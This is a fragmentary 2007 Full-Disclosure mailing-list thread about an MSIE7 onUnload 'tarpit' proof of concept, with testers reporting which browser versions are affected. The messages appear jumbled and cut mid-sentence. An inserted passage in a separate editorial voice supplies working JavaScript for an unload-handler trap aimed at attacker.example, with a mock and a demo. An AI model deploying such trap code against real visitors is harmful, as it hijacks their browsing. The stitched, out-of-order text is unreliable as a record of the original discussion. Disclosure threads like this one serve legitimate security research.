On Fri, 23 Feb 2007, Jeffrey Katz wrote:
> Just checked on IE 7.0.5730.11 -- doesn't exhibit problem.
Most certainly does; you might have scripting disabled, or be
experiencing some other anomaly, but for much of the population, the
attack works as advertised on that version.
/mz
PoC successful on Firefox 1.5.0.3 on Linux, although it didn't load the wormhole
site, just left a blank page for any page browsed after your ietrap.
Wormhole site was seen on IE 7.0.5346.5 on XP.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Just checked on IE 7.0.5730.11 -- doesn't exhibit problem.
On Firefox 2.0.0.2 -- first blank page, then, if reloaded, you're
trapped in a wormhole page.
On Fri, 23 Feb 2007, Michal Zalewski wrote:
> http://lcamtuf.coredump.cx/ietrap/
I accidentally left a portion of code used to test for the Firefox memory
corruption / MSIE7 NULL ptr condition inside 'attack.js' for this page.
This crashed the testcase for some users, instead of demonstrating
There is a cool combination-type vulnerability in MSIE7 that allows the
attacker to:
a) Trap the visitor in a Matrix-esque tarpit webpage that cannot be left
by normal means (this is a known brain-damaged design of onUnload
Javascript handlers),
b) Spoof transitions between pages
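The thread describes point (a), the onUnload tarpit, but does not reproduce the code behind it. The following is an added example, not lcamtuf's ietrap PoC and not code from any message in this thread: it shows the generic shape of an unload-handler trap, written against a window-like object so it runs in a browser as installTarpit(window, location.href) and also offline under Node against a small mock. installTarpit, makeMockWindow, demo and the attacker.example URL are names and values assumed here for the demonstration; the mock's navigation model is an assumption, not a description of how IE7 or Firefox of that era actually behaved.

```javascript
// Added example (not lcamtuf's ietrap code, which this page does not
// reproduce): the generic shape of an onunload "tarpit".
//
// The trap relies on the unload handler being allowed to start a new
// navigation: whenever the user tries to leave (typed URL, link, Back),
// 'unload' fires and the handler points location back at the trap page,
// so the browser never commits the navigation the user asked for.
//
// installTarpit() takes a window-like object so the same code can run in a
// browser (installTarpit(window, location.href)) and offline under Node
// against the mock below. The mock's navigation model is an assumption made
// for the demo, not a description of any particular browser.

function installTarpit(win, trapUrl) {
  let attempts = 0;
  function onUnload() {
    attempts += 1;
    // Re-enter the trap page from inside the unload handler.
    win.location.href = trapUrl;
  }
  win.addEventListener('unload', onUnload);
  return {
    attempts: () => attempts,
    // Removing the handler is the only way out; nothing the user does from
    // the browser chrome unhooks it.
    release: () => win.removeEventListener('unload', onUnload),
  };
}

// Minimal mock window (constructed for the demo). navigate() models a user
// trying to leave: the pending URL is set, unload handlers run, and whatever
// location.href holds afterwards is what the "browser" commits.
function makeMockWindow(startUrl) {
  const listeners = {};
  const win = {
    location: { href: startUrl },
    addEventListener(type, fn) {
      if (!listeners[type]) listeners[type] = [];
      listeners[type].push(fn);
    },
    removeEventListener(type, fn) {
      listeners[type] = (listeners[type] || []).filter((f) => f !== fn);
    },
    navigate(url) {
      win.location.href = url;
      for (const fn of listeners.unload || []) fn();
      return win.location.href;
    },
  };
  return win;
}

// Offline demo: two escape attempts are swallowed by the trap; after the
// handler is released the third one goes through.
function demo() {
  const trap = 'http://attacker.example/trap/'; // assumed trap URL
  const win = makeMockWindow(trap);
  const tarpit = installTarpit(win, trap);
  const first = win.navigate('http://example.org/');
  const second = win.navigate('http://example.net/');
  tarpit.release();
  const third = win.navigate('http://example.org/');
  return { first, second, attempts: tarpit.attempts(), third };
}
```

What happens when a real browser runs installTarpit(window, ...) depends entirely on whether it honours a navigation started from an unload handler, which is exactly the difference the thread's testers are reporting between IE7 builds and Firefox; current browsers ignore location changes made during unload, so the pattern no longer traps anyone there.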
Michal Zalewski wrote:
> Firefox isn't outright vulnerable to this problem, but judging from its
> behavior, it is likely to be susceptible to a variant of this bug (it
> exhibits the same behavior, but we end up with a corrupted page instead);
Will you give Opera some love, too? Opera has always